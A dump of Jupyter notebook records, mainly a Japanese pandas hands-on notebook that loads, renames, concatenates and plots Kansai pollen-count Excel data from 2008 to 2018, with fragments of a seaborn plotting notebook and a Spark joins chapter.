"g = sns.PairGrid(tips, hue=\"size\", palette=\"GnBu_d\")\ng.map(plt.scatter, s=50, edgecolor=\"white\")\ng.add_legend();",
"_____no_output_____"
]
],
[
[
":class:`PairGrid` is flexible, but to take a quick look at a dataset, it can be easier to use :func:`pairplot`. This function uses scatterplots and histograms by default, although a few other kinds will be added (currently, you can also plot regression plots on the off-diagonals and KDEs on the diagonal).",
"_____no_output_____"
]
],
[
[
"sns.pairplot(iris, hue=\"species\", height=2.5);",
"_____no_output_____"
]
],
[
[
"You can also control the aesthetics of the plot with keyword arguments, and it returns the :class:`PairGrid` instance for further tweaking.",
"_____no_output_____"
]
],
[
[
"g = sns.pairplot(iris, hue=\"species\", palette=\"Set2\", diag_kind=\"kde\", height=2.5)",
"_____no_output_____"
]
],
[
[
".. raw:: html\n\n </div>",
"_____no_output_____"
]
]
] | [
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw"
] | [
[
"raw",
"raw",
"raw"
],
[
"code",
"code",
"code"
],
[
"raw"
],
[
"code",
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
]
] |
cb2aad9b6369e6a11edbdacfdeb4f4a800e60053 | 144,934 | ipynb | Jupyter Notebook | work/03_concat_df.ipynb | hannari-python/pandas-handson | f5d40228a0df8607acacacf8a5744b756a42fc39 | [
"Apache-2.0"
] | 7 | 2019-03-15T05:06:45.000Z | 2021-06-26T03:26:35.000Z | work/03_concat_df.ipynb | hannari-python/pandas-handson | f5d40228a0df8607acacacf8a5744b756a42fc39 | [
"Apache-2.0"
] | 1 | 2019-03-03T05:18:56.000Z | 2019-03-03T05:42:34.000Z | work/03_concat_df.ipynb | hannari-python/pandas-handson | f5d40228a0df8607acacacf8a5744b756a42fc39 | [
"Apache-2.0"
] | 3 | 2019-03-03T05:12:34.000Z | 2019-03-17T14:04:00.000Z | 41.961204 | 17,784 | 0.492673 | [
[
[
"**handson用資料としての注意点**\n\n普通、同じセル上で何度も試行錯誤するので、最終的に上手くいったセルしか残らず、失敗したセルは残りませんし、わざわざ残しません。\n\n今回はhandson用に 試行・思考過程を残したいと思い、エラーやミスが出ても下のセルに進んで処理を実行するようにしています。\n\nnotebookのセル単位の実行ができるからこそのやり方かもしれません。良い。\n\n(下のセルから文は常体で書きます。)\n\nkunai (@jdgthjdg)\n\n---\n",
"_____no_output_____"
],
[
"# ここまでの処理を整理して、2008〜2019のデータを繋いでみる",
"_____no_output_____"
],
[
"## xls,xlsxファイルを漁る",
"_____no_output_____"
]
],
[
[
"from pathlib import Path",
"_____no_output_____"
],
[
"base_dir = Path(\"../../../data\") # 相対パスが違うかも ../ の調整でいけるはず・・・\nbase_dir.exists()",
"_____no_output_____"
],
[
"list(base_dir.glob(\"*_kansai/*\"))",
"_____no_output_____"
],
[
"p = list(base_dir.glob(\"*_kansai/*\"))[0]\np.name",
"_____no_output_____"
],
[
"kansai_kafun_files = []\nfor p in base_dir.glob(\"*_kansai/*\"):\n # AMeDASだけ弾く\n if not p.name.startswith(\"AMeDAS\"):\n kansai_kafun_files.append(p)\nkansai_kafun_files",
"_____no_output_____"
]
],
[
[
"lock ファイルが混じってしまった。<BR>\nAMeDASだけ弾くと .lockファイルも入ってしまう(この時私がこのファイルをエクセル互換ソフトで開いていたため、.lockファイルが生成された)ので、<br>\n試しに **読めない文字 ( ë╘ò▓âfü[â )** で引っ掛けてみる",
"_____no_output_____"
]
],
[
[
"kansai_kafun_files = []\nfor p in base_dir.glob(\"*_kansai/*\"):\n # AMeDASだけ弾くと .lockファイルも入ってしまうので、読めない謎の文字で引っ掛けてみる\n if p.name.startswith(\"ë╘ò▓âfü[â\"):\n kansai_kafun_files.append(p)\nkansai_kafun_files",
"_____no_output_____"
]
],
[
[
"いけた(環境によっていけないみたいなので、その時は一つ上の、AMeDASを弾くパターンで)",
"_____no_output_____"
],
[
"ソートしてもいいけど、どのみち日付データはとるのでこのまま",
"_____no_output_____"
],
[
"---",
"_____no_output_____"
],
[
"# 今までの処理を適用していく",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n#設定でDataFrameなどが長く表示されないようにします(画面領域の消費を抑えてhandsonをしやすくするため)\n# 長い場合の途中の省略表示(...)を出す閾値の設定(折り返しとは無関係)\npd.set_option('max_rows',10)\npd.set_option('max_columns',20) # これを超えたら全部は表示しない。 A B C ... X Y Z のように途中を省く。",
"_____no_output_____"
],
[
"p = kansai_kafun_files[-1]\nprint(p)\ndf = pd.read_excel(p, skiprows=1).iloc[:,:-2]\ndf",
"../../../data/2013_kansai/ë╘ò▓âfü[â^2013(è╓É╝).xls\n"
],
[
"str_concat_h0_23 = df[\"年\"].astype(str)+\"/\"+df[\"月\"].astype(str)+\"/\"+df[\"日\"].astype(str)+\"/\"+(df[\"時\"]-1).astype(str) # 時から1引いてる\ndf[\"date_hour\"] = pd.to_datetime(str_concat_h0_23, format=\"%Y/%m/%d/%H\")\ndf.set_index(\"date_hour\", inplace=True)\ndf = df.drop(columns=[\"年\",\"月\",\"日\",\"時\",]) # こっちでも全然良い\ndf",
"_____no_output_____"
]
],
[
[
"# ここまでを関数にする",
"_____no_output_____"
],
[
"多くの試行錯誤があったがこれだけのコードに圧縮された・・・",
"_____no_output_____"
]
],
[
[
"def load_kafun_excel(path):\n df = pd.read_excel(path, skiprows=1).iloc[:,:-2]\n str_concat_h0_23 = df[\"年\"].astype(str)+\"/\"+df[\"月\"].astype(str)+\"/\"+df[\"日\"].astype(str)+\"/\"+(df[\"時\"]-1).astype(str) # 時から1引いてる\n df[\"date_hour\"] = pd.to_datetime(str_concat_h0_23, format=\"%Y/%m/%d/%H\")\n df.set_index(\"date_hour\", inplace=True)\n df = df.drop(columns=[\"年\",\"月\",\"日\",\"時\",]) # こっちでも全然良い\n return df",
"_____no_output_____"
],
[
"load_kafun_excel(p)",
"_____no_output_____"
]
],
[
[
"## for文で回す",
"_____no_output_____"
]
],
[
[
"kansai_kafun_files",
"_____no_output_____"
],
[
"kafun_df_list = []\nfor p in kansai_kafun_files:\n df = load_kafun_excel(p)\n kafun_df_list.append(df)",
"_____no_output_____"
],
[
"kafun_df_list[0].shape",
"_____no_output_____"
]
],
[
[
"# リスト内のdfを行方向(縦方向, y方向)に連結する",
"_____no_output_____"
],
[
"### **[pd.concat](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.concat.html)**\n\ndf の連結/結合/マージ \nhttp://pandas.pydata.org/pandas-docs/stable/user_guide/merging.html\n",
"_____no_output_____"
]
],
[
[
"kafun = pd.concat(kafun_df_list, axis=1)\nkafun.shape",
"_____no_output_____"
],
[
"kafun.columns",
"_____no_output_____"
]
],
[
[
"<br>\nミスってcolumnsの数が成長した。横方向につながっている \n<br>\n<br>",
"_____no_output_____"
]
],
[
[
"kafun = pd.concat(kafun_df_list, axis=0) # Warning",
"/opt/conda/lib/python3.7/site-packages/ipykernel_launcher.py:1: FutureWarning: Sorting because non-concatenation axis is not aligned. A future version\nof pandas will change to not sort by default.\n\nTo accept the future behavior, pass 'sort=False'.\n\nTo retain the current behavior and silence the warning, pass 'sort=True'.\n\n \"\"\"Entry point for launching an IPython kernel.\n"
]
],
[
[
"warning された。 今後ソートしないとのこと",
"_____no_output_____"
]
],
[
[
"kafun = pd.concat(kafun_df_list, axis=0, sort=False)\nkafun.shape",
"_____no_output_____"
]
],
[
[
"このaxis方向でも columns が倍くらいに増えている・・・",
"_____no_output_____"
]
],
[
[
"kafun.columns",
"_____no_output_____"
]
],
[
[
"恐らく年が変わった時に列の名前が変わったようだ(多分担当者も) \nデータのフォーマットが変わると、恐ろしく面倒なことが起きる・・・",
"_____no_output_____"
]
],
[
[
"kafun_df_list[0].columns",
"_____no_output_____"
],
[
"kafun_df_list[1].columns",
"_____no_output_____"
]
],
[
[
"# 想像以上に全然違う・・・\n\nファイル名をみる",
"_____no_output_____"
]
],
[
[
"kansai_kafun_files[0].name",
"_____no_output_____"
],
[
"kansai_kafun_files[1].name",
"_____no_output_____"
]
],
[
[
"xlsとxlsxの頃から変わったのかも? とりあえず ロードした時にcolumnsを表示する雑な関数を作って試す",
"_____no_output_____"
]
],
[
[
"def show_columns(path):\n df = pd.read_excel(path, skiprows=1).iloc[:,:-2]\n return df.columns",
"_____no_output_____"
],
[
"for p in kansai_kafun_files:\n print(p, show_columns(p))",
"../../../data/2010_kansai/ë╘ò▓âfü[â^2010(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '山崎', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2017_kansai/ë╘ò▓âfü[â^2017(è╓É╝).xlsx Index(['年', '月', '日', '時', '彦根市役所', '滋賀県琵琶湖・環境科学研究センター', '滋賀県高島合同庁舎',\n '滋賀県林業普及センター', '京都府立医科大学', '京都府中丹東保健所', '京都市右京区役所京北合同庁舎',\n '大阪合同庁舎第2号館別館', '豊中市役所第一庁舎', '泉大津市役所', '兵庫県立健康環境科学研究センター', '北山緑化植物園',\n '兵庫県篠山庁舎', '西播磨県民局西播磨総合庁舎', '奈良県産業振興総合センター', '奈良県吉野保健所', '橿原総合庁舎',\n '和歌山地方気象台', '和歌山県西牟婁振興局庁舎', '和歌山県東牟婁振興局'],\n dtype='object')\n../../../data/2015_kansai/ë╘ò▓âfü[â^2015(è╓É╝).xlsx Index(['年', '月', '日', '時', '彦根市役所', '滋賀県琵琶湖・環境科学研究センター', '滋賀県高島合同庁舎',\n '滋賀県森林センター', '京都府立医科大学', '京都府中丹東保健所', '京都市右京区役所京北合同庁舎',\n '大阪府環境農林水産総合研究所', '豊中市役所第一庁舎', '泉大津市役所', '兵庫県立健康環境科学研究センター', '北山緑化植物園',\n '兵庫県篠山庁舎', '西播磨県民局西播磨総合庁舎', '奈良県産業振興総合センター', '奈良県吉野保健所', '橿原総合庁舎',\n '和歌山地方気象台', '和歌山県西牟婁振興局庁舎', '和歌山県東牟婁振興局'],\n dtype='object')\n../../../data/2009_kansai/ë╘ò▓âfü[â^2009(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '山崎', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2014_kansai/ë╘ò▓âfü[â^2014(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '西播磨', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2012_kansai/ë╘ò▓âfü[â^2012(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '西播磨', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2008_kansai/ë╘ò▓âfü[â^2008(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '山崎', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2016_kansai/ë╘ò▓âfü[â^2016(è╓É╝).xlsx Index(['年', '月', '日', '時', '彦根市役所', '滋賀県琵琶湖・環境科学研究センター', '滋賀県高島合同庁舎',\n '滋賀県林業普及センター', '京都府立医科大学', '京都府中丹東保健所', '京都市右京区役所京北合同庁舎',\n '大阪府環境農林水産総合研究所', '豊中市役所第一庁舎', '泉大津市役所', '兵庫県立健康環境科学研究センター', '北山緑化植物園',\n '兵庫県篠山庁舎', '西播磨県民局西播磨総合庁舎', '奈良県産業振興総合センター', '奈良県吉野保健所', '橿原総合庁舎',\n '和歌山地方気象台', '和歌山県西牟婁振興局庁舎', '和歌山県東牟婁振興局'],\n dtype='object')\n../../../data/2018_kansai/ë╘ò▓âfü[â^2018(è╓É╝).xlsx Index(['年', '月', '日', '時', '彦根地方気象台', '滋賀県琵琶湖・環境科学研究センター', '滋賀県高島合同庁舎',\n '京都府立医科大学', '舞鶴市西コミュニティセンター', '京都市右京区役所京北合同庁舎', '大阪合同庁舎第2号館別館',\n '豊中市役所第一庁舎', '泉大津市役所', '兵庫県立健康環境科学研究センター', '北山緑化植物園', '兵庫県篠山庁舎',\n '兵庫県環境研究センター', '奈良県産業振興総合センター', '奈良県吉野保健所', '橿原総合庁舎', '和歌山地方気象台',\n '和歌山県西牟婁振興局庁舎', '和歌山県東牟婁振興局'],\n dtype='object')\n../../../data/2011_kansai/ë╘ò▓âfü[â^2011(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '山崎', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2013_kansai/ë╘ò▓âfü[â^2013(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '西播磨', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n"
]
],
[
[
"<br>\n年が順不同で見にくいので結局ソートしてみる",
"_____no_output_____"
]
],
[
[
"sorted(kansai_kafun_files) ",
"_____no_output_____"
]
],
[
[
"---\n**もしソートがうまくいかないパスだったら sorted の key=を設定する**",
"_____no_output_____"
]
],
[
[
"p.name[10:14] # ファイル名から年を抜き出すスライスがこれだった",
"_____no_output_____"
],
[
"# フォルダ名にかかわらず、ファイル名の 20xx で数値のソートされる\nsorted(kansai_kafun_files, key=lambda x:int(x.name[10:14]))",
"_____no_output_____"
],
[
"sorted(kansai_kafun_files, key=lambda x: (-1)*int(x.name[10:14])) # マイナスにすれば逆になるのが分かる",
"_____no_output_____"
]
],
[
[
"<br>\nソート後にまた columns を見る",
"_____no_output_____"
]
],
[
[
"for p in sorted(kansai_kafun_files):\n print(p, show_columns(p))",
"../../../data/2008_kansai/ë╘ò▓âfü[â^2008(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '山崎', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2009_kansai/ë╘ò▓âfü[â^2009(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '山崎', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2010_kansai/ë╘ò▓âfü[â^2010(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '山崎', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2011_kansai/ë╘ò▓âfü[â^2011(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '山崎', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2012_kansai/ë╘ò▓âfü[â^2012(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '西播磨', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2013_kansai/ë╘ò▓âfü[â^2013(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '西播磨', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2014_kansai/ë╘ò▓âfü[â^2014(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '西播磨', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2015_kansai/ë╘ò▓âfü[â^2015(è╓É╝).xlsx Index(['年', '月', '日', '時', '彦根市役所', '滋賀県琵琶湖・環境科学研究センター', '滋賀県高島合同庁舎',\n '滋賀県森林センター', '京都府立医科大学', '京都府中丹東保健所', '京都市右京区役所京北合同庁舎',\n '大阪府環境農林水産総合研究所', '豊中市役所第一庁舎', '泉大津市役所', '兵庫県立健康環境科学研究センター', '北山緑化植物園',\n '兵庫県篠山庁舎', '西播磨県民局西播磨総合庁舎', '奈良県産業振興総合センター', '奈良県吉野保健所', '橿原総合庁舎',\n '和歌山地方気象台', '和歌山県西牟婁振興局庁舎', '和歌山県東牟婁振興局'],\n dtype='object')\n../../../data/2016_kansai/ë╘ò▓âfü[â^2016(è╓É╝).xlsx Index(['年', '月', '日', '時', '彦根市役所', '滋賀県琵琶湖・環境科学研究センター', '滋賀県高島合同庁舎',\n '滋賀県林業普及センター', '京都府立医科大学', '京都府中丹東保健所', '京都市右京区役所京北合同庁舎',\n '大阪府環境農林水産総合研究所', '豊中市役所第一庁舎', '泉大津市役所', '兵庫県立健康環境科学研究センター', '北山緑化植物園',\n '兵庫県篠山庁舎', '西播磨県民局西播磨総合庁舎', '奈良県産業振興総合センター', '奈良県吉野保健所', '橿原総合庁舎',\n '和歌山地方気象台', '和歌山県西牟婁振興局庁舎', '和歌山県東牟婁振興局'],\n dtype='object')\n../../../data/2017_kansai/ë╘ò▓âfü[â^2017(è╓É╝).xlsx Index(['年', '月', '日', '時', '彦根市役所', '滋賀県琵琶湖・環境科学研究センター', '滋賀県高島合同庁舎',\n '滋賀県林業普及センター', '京都府立医科大学', '京都府中丹東保健所', '京都市右京区役所京北合同庁舎',\n '大阪合同庁舎第2号館別館', '豊中市役所第一庁舎', '泉大津市役所', '兵庫県立健康環境科学研究センター', '北山緑化植物園',\n '兵庫県篠山庁舎', '西播磨県民局西播磨総合庁舎', '奈良県産業振興総合センター', '奈良県吉野保健所', '橿原総合庁舎',\n '和歌山地方気象台', '和歌山県西牟婁振興局庁舎', '和歌山県東牟婁振興局'],\n dtype='object')\n../../../data/2018_kansai/ë╘ò▓âfü[â^2018(è╓É╝).xlsx Index(['年', '月', '日', '時', '彦根地方気象台', '滋賀県琵琶湖・環境科学研究センター', '滋賀県高島合同庁舎',\n '京都府立医科大学', '舞鶴市西コミュニティセンター', '京都市右京区役所京北合同庁舎', '大阪合同庁舎第2号館別館',\n '豊中市役所第一庁舎', '泉大津市役所', '兵庫県立健康環境科学研究センター', '北山緑化植物園', '兵庫県篠山庁舎',\n '兵庫県環境研究センター', '奈良県産業振興総合センター', '奈良県吉野保健所', '橿原総合庁舎', '和歌山地方気象台',\n '和歌山県西牟婁振興局庁舎', '和歌山県東牟婁振興局'],\n dtype='object')\n"
]
],
[
[
"---\n2015年にxlsxに変わった途端に・・・<br>\n\nこれでは元データのエクセルか、ウェブページの注釈的なものを探さないと追跡ができない \n\nもういちどエクセルを見てみると、 \n古いデータには、 \"地点\" という別のシートがあった!",
"_____no_output_____"
],
[
"sheet_nameには文字列以外にもindexが使えるとdocumentに書いてあった。 \n誰かのブログをコピってるだけだったら気づけなかったかもしれない。(自戒)",
"_____no_output_____"
]
],
[
[
"names = pd.read_excel(\"../../../data/2008_kansai/ë╘ò▓âfü[â^2008(è╓É╝).xls\", sheet_name=1)\nnames",
"_____no_output_____"
]
],
[
[
"## 列名をrenameするmapperを作る\n\nここからは適当にメソッドを探して対処していくしかない。。 \npandas力が試される・・・\n\nmappingするなら辞書が良いから辞書っぽいのを探す",
"_____no_output_____"
]
],
[
[
"names[\"地点名\"].to_dict()",
"_____no_output_____"
]
],
[
[
"<br>\nkey:value が index:列の値 となるdictができたので、index を \"地点名\" 列にして、\"施設名\" との .to_dictすれば良さそう",
"_____no_output_____"
]
],
[
[
"rename_mapper = names.set_index(\"地点名\")[\"施設名\"].to_dict()\nrename_mapper",
"_____no_output_____"
]
],
[
[
"これ。きた。",
"_____no_output_____"
]
],
[
[
"df.rename(columns=rename_mapper).head(1)\n# OK",
"_____no_output_____"
]
],
[
[
"関数に埋め込む",
"_____no_output_____"
]
],
[
[
"def load_kafun_excel_renamed_columns(path):\n df = pd.read_excel(path, skiprows=1).iloc[:,:-2]\n try:\n name = pd.read_excel(path, sheet_name=1)\n rename_mapper = names.set_index(\"地点名\")[\"施設名\"].to_dict()\n df = df.rename(columns=rename_mapper)\n \n except Exception as e:\n print(path, e)\n \n str_concat_h0_23 = df[\"年\"].astype(str)+\"/\"+df[\"月\"].astype(str)+\"/\"+df[\"日\"].astype(str)+\"/\"+(df[\"時\"]-1).astype(str) # 時から1引いてる\n df[\"date_hour\"] = pd.to_datetime(str_concat_h0_23, format=\"%Y/%m/%d/%H\")\n df.set_index(\"date_hour\", inplace=True)\n df = df.drop(columns=[\"年\",\"月\",\"日\",\"時\",]) # こっちでも全然良い\n return df",
"_____no_output_____"
],
[
"kafun_df_list = []\nfor p in sorted(kansai_kafun_files):\n df = load_kafun_excel_renamed_columns(p)\n kafun_df_list.append(df)\nkafun_renamed = pd.concat(kafun_df_list, axis=0, sort=False)\nkafun_renamed.shape",
"../../../data/2015_kansai/ë╘ò▓âfü[â^2015(è╓É╝).xlsx list index out of range\n../../../data/2016_kansai/ë╘ò▓âfü[â^2016(è╓É╝).xlsx list index out of range\n../../../data/2017_kansai/ë╘ò▓âfü[â^2017(è╓É╝).xlsx list index out of range\n../../../data/2018_kansai/ë╘ò▓âfü[â^2018(è╓É╝).xlsx list index out of range\n"
]
],
[
[
"xlsxだけエラーになってくれてるのでxlsでは読み込めているようだ\n\n果たして結果は?",
"_____no_output_____"
]
],
[
[
"kafun_renamed.columns",
"_____no_output_____"
]
],
[
[
"---\n似た名前を探すためにソートしてみる",
"_____no_output_____"
]
],
[
[
"kafun_renamed.columns.sort_values()",
"_____no_output_____"
]
],
[
[
"---\n\n**'北山緑化植物園','北山緑化植物園(西宮市都市整備公社)'**\n\n**'西播磨', '西播磨県民局西播磨総合庁舎'** とか同一では? \n列名のゆらぎが・・・(予想はしていたがこれを全部追うのは大変なので今回はパス!)",
"_____no_output_____"
],
[
"ここでHPをもう一度見てみると。 \nhttp://kafun.taiki.go.jp/library.html#4\n\n>彦根地方気象台\t彦根市城町2丁目5-25\t彦根\t平成29年度に彦根市役所から移設 \n>舞鶴市西コミュニティセンター\t舞鶴市字南田辺1番地\t舞鶴\t平成29年度に京都府中丹東保健所より移設\n",
"_____no_output_____"
],
[
"## 追っかけるのも大変、かつ、そこまでを求めていないため、今回は少ないデータも全部残して次へ進む",
"_____no_output_____"
],
[
"---\n\n## (今回はしないが)もし少ないものを弾きたいなら\n\n全部の対応を探すのは流石に厳しそうなので、各列での NaNの値を数えてみて、NaNの値が少ないものは2008〜2018まで列名がつながっていると判断する",
"_____no_output_____"
],
[
"**count()** がそれに当たる \n**sort_values** でソートしている",
"_____no_output_____"
]
],
[
[
"kafun_renamed.count().sort_values(ascending=True).head(10)",
"_____no_output_____"
],
[
"kafun_renamed.count().sort_values(ascending=False).head(10) # Falseにしなくても、上のコードをtailにするだけでも良い",
"_____no_output_____"
]
],
[
[
"---\n\n# 一旦ここまでのデータをpickleに保存\n\nここまでの処理で生成したDataFrameをpickleで保存しておく。 \npickle にしておくと読み込みも一瞬。 \n最初からcsvなどを読んで成形して・・・を行うコードを書かなくても良いので、一時的なセーブデータとしては重宝する!(日付のパースなどの処理をやり直さなくて良いので高速)",
"_____no_output_____"
]
],
[
[
"kafun_renamed",
"_____no_output_____"
],
[
"kafun_renamed.to_pickle(\"kafun03.pkl\")",
"_____no_output_____"
]
],
[
[
"# 現状のデータをplotしてみる",
"_____no_output_____"
]
],
[
[
"kafun_renamed.京都府立医科大学.plot()",
"_____no_output_____"
],
[
"kafun_renamed.plot(legend=False)",
"_____no_output_____"
],
[
"kafun_renamed.tail()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb2ad4a566e8dc85aa509ae72807f8b4651c30bf | 8,071 | ipynb | Jupyter Notebook | books/spark/Chapter 8.ipynb | reddy-s/codebooks | 76f485b3d715db1676583e18bbae24f3a23d2eee | [
"Apache-2.0"
] | null | null | null | books/spark/Chapter 8.ipynb | reddy-s/codebooks | 76f485b3d715db1676583e18bbae24f3a23d2eee | [
"Apache-2.0"
] | null | null | null | books/spark/Chapter 8.ipynb | reddy-s/codebooks | 76f485b3d715db1676583e18bbae24f3a23d2eee | [
"Apache-2.0"
] | 1 | 2019-12-01T09:54:01.000Z | 2019-12-01T09:54:01.000Z | 33.911765 | 112 | 0.364887 | [
[
[
"# Chapter 8\n\n## Joins",
"_____no_output_____"
]
],
[
[
"person = spark.createDataFrame([\n (0, \"Bill Chambers\", 0, [100]),\n (1, \"Matei Zaharia\", 1, [500, 250, 100]),\n (2, \"Michael Armbrust\", 1, [250, 100])])\\\n .toDF(\"id\", \"name\", \"graduate_program\", \"spark_status\")\ngraduateProgram = spark.createDataFrame([\n (0, \"Masters\", \"School of Information\", \"UC Berkeley\"),\n (2, \"Masters\", \"EECS\", \"UC Berkeley\"),\n (1, \"Ph.D.\", \"EECS\", \"UC Berkeley\")])\\\n .toDF(\"id\", \"degree\", \"department\", \"school\")\nsparkStatus = spark.createDataFrame([\n (500, \"Vice President\"),\n (250, \"PMC Member\"),\n (100, \"Contributor\")])\\\n .toDF(\"id\", \"status\")",
"_____no_output_____"
],
[
"# Inner Join\njoinExpression = person[\"graduate_program\"] == graduateProgram['id']\nperson.join(graduateProgram, joinExpression).show()",
"+---+----------------+----------------+---------------+---+-------+--------------------+-----------+\n| id| name|graduate_program| spark_status| id| degree| department| school|\n+---+----------------+----------------+---------------+---+-------+--------------------+-----------+\n| 0| Bill Chambers| 0| [100]| 0|Masters|School of Informa...|UC Berkeley|\n| 1| Matei Zaharia| 1|[500, 250, 100]| 1| Ph.D.| EECS|UC Berkeley|\n| 2|Michael Armbrust| 1| [250, 100]| 1| Ph.D.| EECS|UC Berkeley|\n+---+----------------+----------------+---------------+---+-------+--------------------+-----------+\n\n"
],
[
